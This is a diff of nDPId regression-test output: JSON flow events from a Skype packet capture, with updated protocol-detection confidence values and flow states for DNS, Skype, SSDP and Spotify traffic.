00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -1209,54 +1209,54 @@ 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":200000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":200000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969643093,"flow_last_seen":1431969698671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1431969793871,"flow_last_seen":1431969802019,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1431969715510,"flow_last_seen":1431969755612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2898,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 